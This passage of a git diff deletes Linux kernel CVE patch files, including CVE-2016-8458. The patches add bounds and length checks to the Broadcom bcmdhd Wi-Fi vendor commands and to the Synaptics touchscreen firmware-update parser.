- int dhd_dev_set_rssi_monitor_cfg(struct net_device *dev, int start,
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index 8d6d234cd11b3..a88d1e2e41320 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3798,6 +3798,7 @@ dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, uint32 event, int
- 	return results;
- }
- 
-+#ifdef DHD_ANQPO_SUPPORT
- void *
- dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int *size)
- {
-@@ -3849,7 +3850,7 @@ dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int
- 
- 	return result;
- }
--
-+#endif /* DHD_ANQPO_SUPPORT */
- 
- void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes,
-       hotlist_type_t type)
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.h b/drivers/net/wireless/bcmdhd/dhd_pno.h
-index b61d0fd866364..a0edf54049acf 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.h
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.h
-@@ -98,8 +98,9 @@
- 
- #define CHANNEL_BUCKET_EMPTY_INDEX                      0xFFFF
- #define GSCAN_RETRY_THRESHOLD              3
--#define MAX_EPNO_SSID_NUM                   64
--
-+#define MAX_EPNO_SSID_NUM                  64
-+#define GSCAN_ANQPO_MAX_HS_LIST_SIZE	   16
-+#define ANQPO_MAX_HS_NAI_REALM_SIZE	   256
- #endif /* GSCAN_SUPPORT */
- 
- enum scan_status {
-@@ -351,10 +352,10 @@ typedef struct gscan_results_cache {
- } gscan_results_cache_t;
- 
- typedef struct {
--    int  id;                            /* identifier of this network block, report this in event */
--    char realm[256];                    /* null terminated UTF8 encoded realm, 0 if unspecified */
--    int64_t roamingConsortiumIds[16];   /* roaming consortium ids to match, 0s if unspecified */
--    uint8 plmn[3];                      /* mcc/mnc combination as per rules, 0s if unspecified */
-+	int  id;
-+	char realm[ANQPO_MAX_HS_NAI_REALM_SIZE];
-+	int64_t roamingConsortiumIds[ANQPO_MAX_PFN_HS];
-+	uint8 plmn[ANQPO_MCC_LENGTH];
- } wifi_passpoint_network;
- 
- typedef struct dhd_pno_gscan_capabilities {
-@@ -517,8 +518,10 @@ extern void dhd_dev_gscan_hotlist_cache_cleanup(struct net_device *dev, hotlist_
- extern int dhd_dev_wait_batch_results_complete(struct net_device *dev);
- extern void * dhd_dev_process_epno_result(struct net_device *dev,
-                         const void  *data, uint32 event, int *send_evt_bytes);
-+#ifdef DHD_ANQPO_SUPPORT
- extern void * dhd_dev_process_anqpo_result(struct net_device *dev,
- 	const void  *data, uint32 event, int *send_evt_bytes);
-+#endif /* DHD_ANQPO_SUPPORT */
- extern int dhd_dev_set_epno(struct net_device *dev);
- extern int dhd_dev_flush_fw_epno(struct net_device *dev);
- #endif /* GSCAN_SUPPORT */
-@@ -567,7 +570,9 @@ extern void dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type)
- extern int dhd_wait_batch_results_complete(dhd_pub_t *dhd);
- extern void * dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data,
- 	uint32 event, int *size);
-+#ifdef DHD_ANQPO_SUPPORT
- extern void * dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int *size);
-+#endif /* DHD_ANQPO_SUPPORT */
- extern void dhd_pno_translate_epno_fw_flags(uint32 *flags);
- extern int dhd_pno_set_epno(dhd_pub_t *dhd);
- extern int dhd_pno_flush_fw_epno(dhd_pub_t *dhd);
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index a56ba6b82e197..3d70a82adfa5e 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -9423,6 +9423,16 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 			} else
- 				err = -ENOMEM;
- 			break;
-+		case WLC_E_PFN_SSID_EXT:
-+			ptr = dhd_dev_process_epno_result(ndev, data, event, &send_evt_bytes);
-+			if (ptr) {
-+				wl_cfgvendor_send_async_event(wiphy, ndev,
-+				    GOOGLE_SCAN_EPNO_EVENT, ptr, send_evt_bytes);
-+				kfree(ptr);
-+			} else
-+				err = -ENOMEM;
-+			break;
-+#ifdef DHD_ANQPO_SUPPORT
- 		case WLC_E_PFN_NET_FOUND:
- 			ptr = dhd_dev_process_anqpo_result(ndev, data, event, &len);
- 			if (ptr) {
-@@ -9432,6 +9442,7 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 			} else
- 				err = -ENOMEM;
- 			break;
-+#endif /* DHD_ANQPO_SUPPORT */
- 		default:
- 			WL_ERR(("Unknown event %d\n", event));
- 			break;
-@@ -10035,7 +10046,10 @@ static void wl_init_event_handler(struct bcm_cfg80211 *cfg)
- 	cfg->evt_handler[WLC_E_PFN_SWC] = wl_notify_gscan_event;
- 	cfg->evt_handler[WLC_E_PFN_BSSID_NET_FOUND] = wl_notify_gscan_event;
- 	cfg->evt_handler[WLC_E_PFN_BSSID_NET_LOST] = wl_notify_gscan_event;
-+	cfg->evt_handler[WLC_E_PFN_SSID_EXT] = wl_notify_gscan_event;
-+#ifdef DHD_ANQPO_SUPPORT
- 	cfg->evt_handler[WLC_E_GAS_FRAGMENT_RX] = wl_notify_gscan_event;
-+#endif /* DHD_ANQPO_SUPPORT */
- 	cfg->evt_handler[WLC_E_ROAM_EXP_EVENT] = wl_handle_roam_exp_event;
- #endif /* GSCAN_SUPPORT */
- 	cfg->evt_handler[WLC_E_RSSI_LQM] = wl_handle_rssi_monitor_event;
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index 5be16a72aa43f..b156660ed053a 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -939,10 +939,13 @@ static int wl_cfgvendor_epno_cfg(struct wiphy *wiphy,
- 	return err;
- }
- 
-+#ifdef DHD_ANQPO_SUPPORT
- static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy,
- 	struct wireless_dev *wdev, const void  *data, int len)
- {
--	int err = BCME_ERROR, rem, type, hs_list_size = 0, malloc_size, i = 0, j, k, num_oi, oi_len;
-+	int err = BCME_ERROR, rem, type, malloc_size, i = 0;
-+	uint32 hs_list_size = 0;
-+	int j, k, num_oi, oi_len;
- 	wifi_passpoint_network *hs_list = NULL, *src_hs;
- 	wl_anqpo_pfn_hs_list_t *anqpo_hs_list;
- 	wl_anqpo_pfn_hs_t *dst_hs;
-@@ -953,52 +956,100 @@ static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy,
- 	char *rcid;
- 
- 	nla_for_each_attr(iter, data, len, rem) {
--		type = nla_type(iter);
--		switch (type) {
--			case GSCAN_ATTRIBUTE_ANQPO_HS_LIST:
--				if (hs_list_size > 0) {
--					hs_list = kmalloc(hs_list_size*sizeof(wifi_passpoint_network), GFP_KERNEL);
--					if (hs_list == NULL) {
--						WL_ERR(("failed to allocate hs_list\n"));
--						return -ENOMEM;
--					}
--				}
--				nla_for_each_nested(outer, iter, tmp) {
--					nla_for_each_nested(inner, outer, tmp1) {
--						type = nla_type(inner);
-+	type = nla_type(iter);
-+	switch (type) {
-+	case GSCAN_ATTRIBUTE_ANQPO_HS_LIST:
-+		if (hs_list) {
-+			err = -EINVAL;
-+			goto exit;
-+		}
-+		if (hs_list_size > GSCAN_ANQPO_MAX_HS_LIST_SIZE) {
-+			err = -EINVAL;
-+			goto exit;
-+		}
-+		if (hs_list_size > 0) {
-+			hs_list = kzalloc(hs_list_size *
-+				sizeof(wifi_passpoint_network), GFP_KERNEL);
-+			if (!hs_list) {
-+				WL_ERR(("failed to allocate hs_list\n"));
-+				return -ENOMEM;
-+			}
-+		}
-+		nla_for_each_nested(outer, iter, tmp) {
-+			if (i == hs_list_size)
-+				break;
-+			nla_for_each_nested(inner, outer, tmp1) {
-+			type = nla_type(inner);
- 
--						switch (type) {
--							case GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID:
--								hs_list[i].id = nla_get_u32(inner);
--								WL_ERR(("%s: net id: %d\n", __func__, hs_list[i].id));
--								break;
--							case GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM:
--								memcpy(hs_list[i].realm,
--								  nla_data(inner), 256);
--								WL_ERR(("%s: realm: %s\n", __func__, hs_list[i].realm));
--								break;
--							case GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID:
--								memcpy(hs_list[i].roamingConsortiumIds,
--								  nla_data(inner), 128);
--								break;
--							case GSCAN_ATTRIBUTE_ANQPO_HS_PLMN:
--								memcpy(hs_list[i].plmn,
--								  nla_data(inner), 3);
--								WL_ERR(("%s: plmn: %c %c %c\n", __func__, hs_list[i].plmn[0], hs_list[i].plmn[1], hs_list[i].plmn[2]));
--								break;
--						}
--					}
--					i++;
-+			switch (type) {
-+			case GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID:
-+				if (nla_len(inner) != sizeof(hs_list[i].id)) {
-+					err = -EINVAL;
-+					goto exit;
- 				}
-+				hs_list[i].id = nla_get_u32(inner);
-+				WL_DBG(("%s: net id: %d\n",
-+					__func__, hs_list[i].id));
- 				break;
--			case GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE:
--				hs_list_size = nla_get_u32(iter);
--				WL_ERR(("%s: ANQPO: %d\n", __func__, hs_list_size));
-+			case GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM:
-+				if (nla_len(inner) !=
-+					sizeof(hs_list[i].realm)) {
-+					err = -EINVAL;
-+					goto exit;
-+				}
-+				memcpy(hs_list[i].realm, nla_data(inner),
-+				       sizeof(hs_list[i].realm));
-+				WL_DBG(("%s: realm: %s\n",
-+					__func__, hs_list[i].realm));
- 				break;
--			default:
--				WL_ERR(("Unknown type: %d\n", type));
--				return err;
-+			case GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID:
-+				if (nla_len(inner) != sizeof(hs_list[i].
-+					roamingConsortiumIds)) {
-+					err = -EINVAL;
-+					goto exit;
-+				}
-+				memcpy(hs_list[i].roamingConsortiumIds,
-+				       nla_data(inner),
-+				       sizeof(hs_list[i].roamingConsortiumIds));
-+				break;
-+			case GSCAN_ATTRIBUTE_ANQPO_HS_PLMN:
-+				if (nla_len(inner) != sizeof(hs_list[i].plmn)) {
-+					err = -EINVAL;
-+					goto exit;
-+				}
-+				memcpy(hs_list[i].plmn,
-+				       nla_data(inner),
-+				       sizeof(hs_list[i].plmn));
-+				WL_DBG(("%s: plmn: %c %c %c\n",
-+					__func__, hs_list[i].plmn[0],
-+					hs_list[i].plmn[1],
-+					hs_list[i].plmn[2]));
-+				break;
-+			}
-+			}
-+			i++;
- 		}
-+		break;
-+	case GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE:
-+		if (nla_len(iter) != sizeof(hs_list_size)) {
-+			err = -EINVAL;
-+			goto exit;
-+		}
-+		hs_list_size = nla_get_u32(iter);
-+		if ((hs_list_size == 0) ||
-+		    (hs_list_size > GSCAN_ANQPO_MAX_HS_LIST_SIZE)) {
-+			WL_ERR(("%s: ANQPO: %d\n", __func__, hs_list_size));
-+			err = -EINVAL;
-+			goto exit;
-+		}
-+		WL_DBG(("%s: ANQPO: %d\n", __func__, hs_list_size));
-+		break;
-+	default:
-+		WL_ERR(("Unknown type: %d\n", type));
-+		err = -EINVAL;
-+		goto exit;
-+	}
-+
- 	}
- 
- 	malloc_size = OFFSETOF(wl_anqpo_pfn_hs_list_t, hs) +
-@@ -1046,7 +1097,7 @@ static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy,
- 	kfree(hs_list);
- 	return err;
- }
--
-+#endif /* DHD_ANQPO_SUPPORT */
- static int wl_cfgvendor_set_batch_scan_cfg(struct wiphy *wiphy,
- 	struct wireless_dev *wdev, const void  *data, int len)
- {
-@@ -3065,6 +3116,7 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = {
- 		.flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV,
- 		.doit = wl_cfgvendor_set_bssid_blacklist
- 	},
-+#ifdef DHD_ANQPO_SUPPORT
- 	{
- 		{
- 			.vendor_id = OUI_GOOGLE,
-@@ -3073,6 +3125,7 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = {
- 		.flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV,
- 		.doit = wl_cfgvendor_gscan_anqpo_config
- 	},
-+#endif /* DHD_ANQPO_SUPPORT */
- #endif /* GSCAN_SUPPORT */
- 	{
- 		{
-@@ -3233,7 +3286,9 @@ static const struct  nl80211_vendor_cmd_info wl_vendor_events [] = {
- 		{ OUI_GOOGLE, GOOGLE_SCAN_EPNO_EVENT },
- 		{ OUI_GOOGLE, GOOGLE_DEBUG_RING_EVENT },
- 		{ OUI_GOOGLE, GOOGLE_FW_DUMP_EVENT },
-+#ifdef DHD_ANQPO_SUPPORT
- 		{ OUI_GOOGLE, GOOGLE_PNO_HOTSPOT_FOUND_EVENT },
-+#endif /* DHD_ANQPO_SUPPORT */
- 		{ OUI_GOOGLE, GOOGLE_RSSI_MONITOR_EVENT },
- 		{ OUI_GOOGLE, GOOGLE_MKEEP_ALIVE_EVENT }
- };
diff --git a/Patches/Linux_CVEs/CVE-2016-8458/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8458/3.10/0001.patch
deleted file mode 100644
index 5364123a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8458/3.10/0001.patch
+++ /dev/null
@@ -1,394 +0,0 @@
-From d567c744898f67e1c54db5339f41815d02f3d59e Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Sun, 13 Nov 2016 14:29:08 -0800
-Subject: [PATCH] input: synaptics_dsx: add update bounds checks.
-
-Firmware updates contain offsets that are parsed
-by the kernel driver.  Ensure all offsets are within
-the bounds of the firmware update.
-
-TESTED:
-successfully parsed update firmware on device boot.
-
-Bug: 31525965
-Bug: 31968442
-Change-Id: If66dd1a837d0606250db6f1c75c89747d106541c
-Signed-off-by: Andrew Chant <achant@google.com>
----
- .../synaptics_dsx25/synaptics_dsx_fw_update.c      | 172 +++++++++++++++++----
- 1 file changed, 144 insertions(+), 28 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-index ff82a4f3a55e8..323f65891b458 100755
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-@@ -691,6 +691,22 @@ static int __init early_parse_tp_panel_cmdline(char *arg)
- }
- early_param("mdss_mdp.panel", early_parse_tp_panel_cmdline);
- 
-+/* Check offset + size <= bound.  1 if in bounds, 0 otherwise. */
-+static int in_bounds(unsigned long offset,
-+		     unsigned long size,
-+		     unsigned long bound)
-+{
-+	if (offset > bound || size > bound) {
-+		pr_err("%s: %lu or %lu > %lu\n", __func__, offset, size, bound);
-+		return 0;
-+	}
-+	if (offset > (bound - size)) {
-+		pr_err("%s: %lu > %lu - %lu\n", __func__, offset, size, bound);
-+		return 0;
-+	}
-+	return 1;
-+}
-+
- static unsigned int le_to_uint(const unsigned char *ptr)
- {
- 	return (unsigned int)ptr[0] +
-@@ -770,8 +786,10 @@ static void fwu_compare_partition_tables(void)
- 	return;
- }
- 
--static void fwu_parse_partition_table(const unsigned char *partition_table,
--		struct block_count *blkcount, struct physical_address *phyaddr)
-+static int fwu_parse_partition_table(const unsigned char *partition_table,
-+				     unsigned long len,
-+				     struct block_count *blkcount,
-+				     struct physical_address *phyaddr)
- {
- 	unsigned char ii;
- 	unsigned char index;
-@@ -784,6 +802,11 @@ static void fwu_parse_partition_table(const unsigned char *partition_table,
- 	tp_log_debug("%s: in!\n",__func__);
- 	for (ii = 0; ii < fwu->partitions; ii++) {
- 		index = ii * 8 + 2;
-+		if (!in_bounds(index, sizeof(*ptable), len)) {
-+			pr_err("%s: %d/%d not in bounds\n", __func__, ii,
-+			       fwu->partitions);
-+			return -EINVAL;
-+		}
- 		ptable = (struct partition_table *)&partition_table[index];
- 		partition_length = ptable->partition_length_15_8 << 8 |
- 				ptable->partition_length_7_0;
-@@ -792,7 +815,7 @@ static void fwu_parse_partition_table(const unsigned char *partition_table,
- 		dev_dbg(rmi4_data->pdev->dev.parent,
- 				"%s: Partition entry %d:\n",
- 				__func__, ii);
--		for (offset = 0; offset < 8; offset++) {
-+		for (offset = 0; offset < sizeof(*ptable); offset++) {
- 			dev_dbg(rmi4_data->pdev->dev.parent,
- 					"%s: 0x%02x\n",
- 					__func__,
-@@ -854,28 +877,36 @@ static void fwu_parse_partition_table(const unsigned char *partition_table,
- 		};
- 	}
- 
--	return;
-+	return 0;
- }
- 
--static void fwu_parse_image_header_10_bl_container(const unsigned char *image)
-+static int fwu_parse_image_header_10_bl_container(const unsigned char *image)
- {
- 	unsigned char ii;
- 	unsigned char num_of_containers;
- 	unsigned int addr;
- 	unsigned int container_id;
-+	unsigned int content_offset;
- 	unsigned int length;
- 	const unsigned char *content;
- 	struct container_descriptor *descriptor;
- 
-+	if (fwu->img.bootloader.size < 4)
-+		return -ENOENT;
- 	num_of_containers = (fwu->img.bootloader.size - 4) / 4;
- 
- 	for (ii = 1; ii <= num_of_containers; ii++) {
- 		addr = le_to_uint(fwu->img.bootloader.data + (ii * 4));
-+		if (!in_bounds(addr, sizeof(*descriptor), fwu->image_size))
-+			return -EINVAL;
- 		descriptor = (struct container_descriptor *)(image + addr);
- 		container_id = descriptor->container_id[0] |
- 				descriptor->container_id[1] << 8;
--		content = image + le_to_uint(descriptor->content_address);
-+		content_offset = le_to_uint(descriptor->content_address);
- 		length = le_to_uint(descriptor->content_length);
-+		if (!in_bounds(content_offset, length, fwu->image_size))
-+			return -EINVAL;
-+		content = image + content_offset;
- 		switch (container_id) {
- 		case BL_CONFIG_CONTAINER:
- 		case GLOBAL_PARAMETERS_CONTAINER:
-@@ -892,10 +923,10 @@ static void fwu_parse_image_header_10_bl_container(const unsigned char *image)
- 		};
- 	}
- 
--	return;
-+	return 0;
- }
- 
--static void fwu_parse_image_header_10(void)
-+static int fwu_parse_image_header_10(void)
- {
- 	unsigned char ii;
- 	unsigned char num_of_containers;
-@@ -903,6 +934,7 @@ static void fwu_parse_image_header_10(void)
- 	unsigned int offset;
- 	unsigned int container_id;
- 	unsigned int length;
-+	unsigned int content_offset;
- 	const unsigned char *image;
- 	const unsigned char *content;
- 	struct container_descriptor *descriptor;
-@@ -911,25 +943,35 @@ static void fwu_parse_image_header_10(void)
- 	tp_log_debug("%s: in!\n",__func__);
- 	image = fwu->image;
- 	header = (struct image_header_10 *)image;
--
-+	if (fwu->image_size < sizeof(*header))
-+		return -EINVAL;
- 	fwu->img.checksum = le_to_uint(header->checksum);
- 
- 	/* address of top level container */
- 	offset = le_to_uint(header->top_level_container_start_addr);
- 	descriptor = (struct container_descriptor *)(image + offset);
-+	if (!in_bounds(offset, sizeof(*descriptor), fwu->image_size))
-+		return -EINVAL;
- 
- 	/* address of top level container content */
- 	offset = le_to_uint(descriptor->content_address);
- 	num_of_containers = le_to_uint(descriptor->content_length) / 4;
- 
- 	for (ii = 0; ii < num_of_containers; ii++) {
-+		if (!in_bounds(offset, 4, fwu->image_size))
-+			return -EINVAL;
- 		addr = le_to_uint(image + offset);
- 		offset += 4;
-+		if (!in_bounds(addr, sizeof(*descriptor), fwu->image_size))
-+			return -EINVAL;
- 		descriptor = (struct container_descriptor *)(image + addr);
- 		container_id = descriptor->container_id[0] |
- 				descriptor->container_id[1] << 8;
--		content = image + le_to_uint(descriptor->content_address);
-+		content_offset = le_to_uint(descriptor->content_address);
- 		length = le_to_uint(descriptor->content_length);
-+		if (!in_bounds(content_offset, length, fwu->image_size))
-+			return -EINVAL;
-+		content = image + content_offset;
- 		switch (container_id) {
- 		case UI_CONTAINER:
- 		case CORE_CODE_CONTAINER:
-@@ -945,7 +987,8 @@ static void fwu_parse_image_header_10(void)
- 			fwu->img.bl_version = *content;
- 			fwu->img.bootloader.data = content;
- 			fwu->img.bootloader.size = length;
--			fwu_parse_image_header_10_bl_container(image);
-+			if (fwu_parse_image_header_10_bl_container(image))
-+				return -EINVAL;
- 			break;
- 		case GUEST_CODE_CONTAINER:
- 			fwu->img.contains_guest_code = true;
-@@ -964,6 +1007,8 @@ static void fwu_parse_image_header_10(void)
- 			break;
- 		case GENERAL_INFORMATION_CONTAINER:
- 			fwu->img.contains_firmware_id = true;
-+			if (length < 4 + 4)
-+				return -EINVAL;
- 			fwu->img.firmware_id = le_to_uint(content + 4);
- 			break;
- 		default:
-@@ -971,10 +1016,10 @@ static void fwu_parse_image_header_10(void)
- 		}
- 	}
- 
--	return;
-+	return 0;
- }
- 
--static void fwu_parse_image_header_05_06(void)
-+static int fwu_parse_image_header_05_06(void)
- {
- 	int retval;
- 	const unsigned char *image;
-@@ -983,6 +1028,8 @@ static void fwu_parse_image_header_05_06(void)
- 
- 	tp_log_debug("%s: in!\n",__func__);
- 	image = fwu->image;
-+	if (fwu->image_size < sizeof(*header))
-+		return -EINVAL;
- 	header = (struct image_header_05_06 *)image;
- 
- 	fwu->img.checksum = le_to_uint(header->checksum);
-@@ -995,18 +1042,51 @@ static void fwu_parse_image_header_05_06(void)
- 
- 	fwu->img.ui_firmware.size = le_to_uint(header->firmware_size);
- 	if (fwu->img.ui_firmware.size) {
--		fwu->img.ui_firmware.data = image + IMAGE_AREA_OFFSET;
--		if (fwu->img.contains_bootloader)
--			fwu->img.ui_firmware.data += fwu->img.bootloader_size;
-+		unsigned int ui_firmware_offset = IMAGE_AREA_OFFSET;
-+
-+		if (fwu->img.contains_bootloader) {
-+			if (!in_bounds(ui_firmware_offset,
-+				       fwu->img.bootloader_size,
-+				       fwu->image_size)) {
-+				return -EINVAL;
-+			}
-+			ui_firmware_offset += fwu->img.bootloader_size;
-+		}
-+		if (!in_bounds(ui_firmware_offset,
-+			       fwu->img.ui_firmware.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
-+		fwu->img.ui_firmware.data = image + ui_firmware_offset;
- 	}
- 
--	if ((fwu->img.bl_version == BL_V6) && header->options_tddi)
-+	if ((fwu->img.bl_version == BL_V6) && header->options_tddi) {
-+		if (!in_bounds(IMAGE_AREA_OFFSET,
-+			       fwu->img.ui_firmware.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
- 		fwu->img.ui_firmware.data = image + IMAGE_AREA_OFFSET;
-+	}
- 
- 	fwu->img.ui_config.size = le_to_uint(header->config_size);
- 	if (fwu->img.ui_config.size) {
--		fwu->img.ui_config.data = fwu->img.ui_firmware.data +
-+		unsigned int ui_firmware_end;
-+
-+		if (fwu->img.ui_firmware.data < image)
-+			return -EINVAL;
-+		if (!in_bounds(fwu->img.ui_firmware.data - image,
-+			       fwu->img.ui_firmware.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
-+		ui_firmware_end = fwu->img.ui_firmware.data - image +
- 				fwu->img.ui_firmware.size;
-+		if (!in_bounds(ui_firmware_end, fwu->img.ui_config.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
-+		fwu->img.ui_config.data = image + ui_firmware_end;
- 	}
- 
- 	if ((fwu->img.bl_version == BL_V5 && fwu->img.contains_bootloader) ||
-@@ -1018,6 +1098,11 @@ static void fwu_parse_image_header_05_06(void)
- 	if (fwu->img.contains_disp_config) {
- 		fwu->img.disp_config_offset = le_to_uint(header->dsp_cfg_addr);
- 		fwu->img.dp_config.size = le_to_uint(header->dsp_cfg_size);
-+		if (!in_bounds(fwu->img.disp_config_offset,
-+			       fwu->img.dp_config.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
- 		fwu->img.dp_config.data = image + fwu->img.disp_config_offset;
- 	} else {
- 		retval = secure_memcpy(fwu->img.cstmr_product_id,
-@@ -1050,28 +1135,52 @@ static void fwu_parse_image_header_05_06(void)
- 	fwu->img.product_id[PRODUCT_ID_SIZE] = 0;
- 
- 	fwu->img.lockdown.size = LOCKDOWN_SIZE;
-+	if (LOCKDOWN_SIZE > IMAGE_AREA_OFFSET)
-+		return -EINVAL;
-+	if (fwu->image_size < IMAGE_AREA_OFFSET)
-+		return -EINVAL;
- 	fwu->img.lockdown.data = image + IMAGE_AREA_OFFSET - LOCKDOWN_SIZE;
- 
--	return;
-+	return 0;
- }
- 
- static int fwu_parse_image_info(void)
- {
- 	struct image_header_10 *header;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-+	unsigned int image_size = 0;
- 
--	tp_log_debug("%s: in!\n",__func__);
-+	tp_log_debug("%s: in!\n", __func__);
- 	header = (struct image_header_10 *)fwu->image;
-+	if (!header) {
-+		tp_log_debug("%s: Invalid header\n", __func__);
-+		return -EINVAL;
-+	}
- 
-+	image_size = fwu->image_size;
-+	if (image_size < sizeof(struct image_header_05_06) &&
-+	    image_size < sizeof(struct image_header_10)) {
-+		tp_log_debug("header too small: %u < (%lu, %lu)",
-+			     image_size, sizeof(struct image_header_05_06),
-+			     sizeof(struct image_header_10));
-+		return -EINVAL;
-+	}
-+	/* This is clearing img, not image. */
- 	memset(&fwu->img, 0x00, sizeof(fwu->img));
- 
- 	switch (header->major_header_version) {
- 	case IMAGE_HEADER_VERSION_10:
--		fwu_parse_image_header_10();
-+		if (fwu_parse_image_header_10()) {
-+			tp_log_debug("%s:error parsing v10 header\n", __func__);
-+			return -EINVAL;
-+		}
- 		break;
- 	case IMAGE_HEADER_VERSION_05:
- 	case IMAGE_HEADER_VERSION_06:
--		fwu_parse_image_header_05_06();
-+		if (fwu_parse_image_header_05_06()) {
-+			tp_log_debug("%s:error parsing v56 header\n", __func__);
-+			return -EINVAL;
-+		}
- 		break;
- 	default:
- 		dev_err(rmi4_data->pdev->dev.parent,
-@@ -1088,9 +1197,13 @@ static int fwu_parse_image_info(void)
- 			return -EINVAL;
- 		}
- 
--		fwu_parse_partition_table(fwu->img.fl_config.data,
--				&fwu->img.blkcount, &fwu->img.phyaddr);
--
-+		if (fwu_parse_partition_table(fwu->img.fl_config.data,
-+					      fwu->img.fl_config.size,
-+					      &fwu->img.blkcount,
-+					      &fwu->img.phyaddr)) {
-+			tp_log_debug("%s:Error parsing ptable\n", __func__);
-+			return -EINVAL;
-+		}
- 		fwu_compare_partition_tables();
- 	} else {
- 		fwu->new_partition_table = false;
-@@ -1669,7 +1782,9 @@ static int fwu_read_f34_v7_queries(void)
- 		return retval;
- 	}
- 
--	fwu_parse_partition_table(ptable, &fwu->blkcount, &fwu->phyaddr);
-+	if (fwu_parse_partition_table(ptable, fwu->partition_table_bytes,
-+				      &fwu->blkcount, &fwu->phyaddr))
-+		return -EINVAL;
- 
- 	return 0;
- }
-@@ -3330,6 +3445,7 @@ static int fwu_start_reflash(void)
- 				__func__, fw_entry->size);
- 
- 		fwu->image = fw_entry->data;
-+		fwu->image_size = fw_entry->size;
- 	}
- 
- 	retval = fwu_parse_image_info();
-@@ -4203,8 +4319,8 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 			&fwu->fwu_work);
- #endif
- 
--        retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj,
--			&dev_attr_data);
-+	retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj,
-+				       &dev_attr_data);
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to create sysfs bin file\n",
diff --git a/Patches/Linux_CVEs/CVE-2016-8458/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8458/3.18/0002.patch
deleted file mode 100644
index 40ae865a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8458/3.18/0002.patch
+++ /dev/null
@@ -1,454 +0,0 @@
-From 11ab3add6cfb1ef752ac38adf1b4bf15617772e9 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Tue, 8 Nov 2016 15:19:32 -0800
-Subject: [PATCH] input: synaptics_dsx: add update bounds checks.
-
-Firmware updates contain offsets that are parsed
-by the kernel driver.  Ensure all offsets are within
-the bounds of the firmware update.
-
-TESTED: Forced a firmware update by removing
-same-firmware check.  Firmware update succeeded.
-
-Bug: 31525965
-Bug: 31968442
-Change-Id: I287f494d973868f6be28799bc2613ff2201b0717
-Signed-off-by: Andrew Chant <achant@google.com>
----
- .../synaptics_dsx_fw_update.c                      | 183 +++++++++++++++++----
- 1 file changed, 154 insertions(+), 29 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-index 05f13b427739b..f7d5dbdd69b53 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
